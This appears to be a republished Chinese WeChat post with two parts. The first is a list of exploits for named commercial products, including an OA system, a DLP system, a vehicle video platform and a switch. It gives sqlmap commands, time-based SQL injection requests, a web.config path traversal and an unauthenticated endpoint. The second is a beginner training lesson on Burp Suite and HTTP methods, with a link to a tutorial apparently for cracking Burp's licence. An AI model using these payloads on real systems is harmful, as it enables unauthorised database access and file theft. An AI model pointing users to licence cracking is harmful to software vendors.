注:小编冒死找到的漏洞资源,希望大家多多支持转发,废话不多说,我直接MDfive发
启明星辰天玥网络安全审计系统SQL 注入漏洞
python sqlmap.py -u "https://ip/ops/index.php?c =Reportguide&a =check rn"
--data "check name =123&tagid =123" --skip-waf --random-agent --dbs --batch --force-ssl
万户 OA SQL 注入漏洞
python sqlmap.py -u
"http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID =1" --level 3 --dbs
锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞
访问接口/safety/ping.htm
通天星 CMSV6 车载视频监控平台disable 存在 SQL 注入漏洞
GET
/edu_security_officer/disable;download Logger.action?ids =1+AND+%28SELECT+
2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL 注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host:
Content-Type: application/x-www-form-urlencoded
command =updateNetSec&state =123';if (select
IS_SRVROLEMEMBER('sysadmin')) =1 WAITFOR DELAY '0:0:5'--
亿赛通数据泄露防护(DLP)系统NoticeAjax SQL 注入漏洞
POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host:
Content-Type: application/x-www-form-urlencoded
command =del Notice¬iceId =123';if (select IS_SRVROLEMEMBER('sysadmin')) =1 WAITFOR DELAY '0:0:5'--
天问物业 ERP 系统AreaAvatarDownLoad.aspx任意文件读取漏洞
GET
/HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar =../we
b.config HTTP/1.1 Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
今天月落安全公益培训的第一天,其实最开始是想开视频给大家上课的,但是最近团队的师傅们都在项目上,想来想去我只好把课程给浓缩一下,以文字的形式让大家以实验代替听讲这样子更快吸收吧。
现在的话我们来介绍一些协议吧,这是了解网络安全基础必须知道的基础。
域名:简单来讲就是一台服务器可以分配的一个名字地址,他可以代替ip来访问那台服务器对外的服务。
域名发现对于安全测试意义:可以给安全测试提供更多的测试点,方便获取更多相关信息
DNS:用来域名和ip互相转换的一个服务
制作网站时常见的脚本语言包括:asp php aspx jsp javaweb pl py cgi 等
在此之前我们介绍一款抓包工具 Burp Suite
在文末我们会发一下这个工具包的压缩包,大家可自行解压或者网上找资源下载
工具需要激活,这边附上激活教程
https://blog.csdn.net/2401_84970145/article/details/138796915
当我们激活好了burp,可以试着抓一些数据包来分析分析
一般人都喜欢在电脑上的浏览器做配置,但是浏览器上有时候不稳定,但是burp上自带了个浏览器,那个倒是挺稳定的接下来我教大家怎么快速抓一个包。
打开burp,点开代理,此时可以看到一个打开自带浏览器,点击打开自带浏览器
我们在burp自带的浏览器上输入百度的域名
此时代理这边的配置默认即可,就是拦截关闭即可,第二步我们查看http历史记录
即可抓到那么多数据包,随便点开一个数据包的内容来看
这是一个标准的请求包和返回包,这个需要同学们自行研究一下这个数据包是怎么构成的,在此之前我们需要了解一下post和get请求方式的区别
这两个区别在于一个是用浏览器传参的,即可在url上面修改参数,一个是通过数据包进行传输的,没错就是burp这上面的抓到的数据包来传输。
GET: 将数据附加在URL的末尾,作为URL的一部分发送给服务器。例如:http://example.com/path/to/page?name=value&name2=value2
POST: 将数据包含在请求的主体部分中发送给服务器,而不是作为URL的一部分发送。数据不可见于URL中。
安全性:
GET: 参数直接暴露在URL中,用户可以在浏览器地址栏中看到发送的数据,不适合传输敏感信息。
POST: 数据不显示在URL中,作为请求的一部分发送,相对安全,适合传输敏感信息。
今天我们讲到的工具就是burp还有他抓包的一种使用,明天我们来讲漏洞原理吧,尽量帮助大家尽快在七天内成为一个合格的蓝队防守人员。
需要大家做一些作业
了解burp抓包的用法,可以成功抓到一个数据包,需要掌握能在burp自带浏览器上抓包,也可以在其他浏览器上抓包。可以在火狐浏览器上安装一个插件
如果抓包访问失败可以从burp上面生成一个证书,装到浏览器上,火狐浏览器打开设置,搜索证书,然后添加证书,安装,如果后续失败,把证书删掉,重新安装即可。
1.用docker去自行搭建一个皮卡丘靶场,明天需要用到,需要用到虚拟机,VMware16可在官网下载,网上有激活码可查,下载一个linux的镜像,下载的镜像尽可能版本要高,需要能兼容docker,有时候会安不上去docker,装到VMware里面去,并且打开他的远程端口,可以在本机上使用finally shell工具去连接。
2.在linux上部署雷池,雷池的部署教程:以下是官方文档打开链接即可
https://docs.waf-ce.chaitin.cn/zh/%E4%B8%8A%E6%89%8B%E6%8C%87%E5%8D%97/%E5%AE%89%E8%A3%85%E9%9B%B7%E6%B1%A0 雷池和皮卡丘靶场需要再本地能访问到,访问成功web页面即可
3.了解osi七层模型,和他每个层的协议都有哪些,还有三次握手
原文始发于微信公众号(月落安全):o秘o I 2024hw最新漏洞情报&&hw培训
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论